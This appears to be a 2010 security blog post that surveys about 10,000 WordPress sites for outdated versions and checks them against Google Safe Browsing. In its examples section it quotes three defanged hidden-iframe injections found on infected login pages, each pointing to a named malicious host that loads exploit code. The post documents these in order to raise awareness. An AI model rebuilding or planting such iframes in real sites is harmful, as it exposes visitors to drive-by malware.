Following up on our last article, this time we will be discussing issues relevant to, likely, the most popular CMS software package available today: WordPress. WordPress, is used by a plethora of individuals and organizations, from bloggers to content publishers, news media outlets and many more. The great thing about this particular CMS is the level to which it can be customized and the number of plugins that exist for it.
WordPress is a prime example of a popular CMS. With more than 8,176 plugins and 73,037,498 downloads, this particular CMS package is extremely popular! I would agree with the statement on the WordPress site which proclaims: “WordPress is a state-of-the-art publishing platform with a focus on aesthetics, web standards, and usability.” It is.
WordPress also offers the flexibility to manage content easily, add attractive themes and customize webpages to your hearts content. And again quoting the main site: “Plugins can extend WordPress to do almost anything you can imagine.” I would agree with this too.
In this post we will be looking at WordPress closely to understand any interesting properties of the active installations publicly seen on the Internet.
The aim of this experiment:
An initial corpus of 100,000 websites was mined (via Google) using a keyword search to locate websites which discussed WordPress. Understandably, not all 100,000 websites would actually be using WordPress. Approximately 10,000 websites from this corpus were analyzed. Each website was analyzed to determine if it was generated by WordPress or its associated plugins. Each website was then cross-referenced with the Google Safe Browsing List. This experiment was conducted between January 28th and January 30th, 2010.
Distribution of WordPress versions:
We found the following distribution of WordPress versions in the websites examined (where versions of installations could be determined).
Note: Publicly available information about exploits for WordPress version < 2.8.6 exist.
We present the most interesting results in brief:
Examples of malware found:
Now we present some examples of the non-obfuscated malware that was detected on some of the analyzed sites.
Example Code #1, detected on: olgamake.com/wp-login.php?action=lostpassword
<if ra e src="hxxp://a151.scrappi ng.cc:80 80/ts/in. cgi ?op en" width=971 height=0 style="visibility: hi dden"></i fra m e>
Example Code #2, detected on: makinghimknown.com/wp-login.php
<if ra e src="src="hxxp://ke ymydoma ins.com/" width="3" height="2"></i fra m e>
Example Code #3, detected on: bisoppreview.com/wp-login.php
<if ra e src="hxxp://ntw porta l.com/" w idth="2" hei ght="4"</i fra m e>
This limited experiment shows that there are many older WordPress installations active on the Internet. Furthermore, some of them are have been infected by non-obfuscated Iframes which point to malicious websites to load exploit code dynamically. WordPress makes for an easy target by lieu of its popularity and wide installation base. The people associated with this CMS software take security very seriously and have done a great job releasing security patches and stable releases. However, the fact remains that vulnerable versions of WordPress are live on the Internet and are hosting malware, primarily via infected Iframes.
Till next time.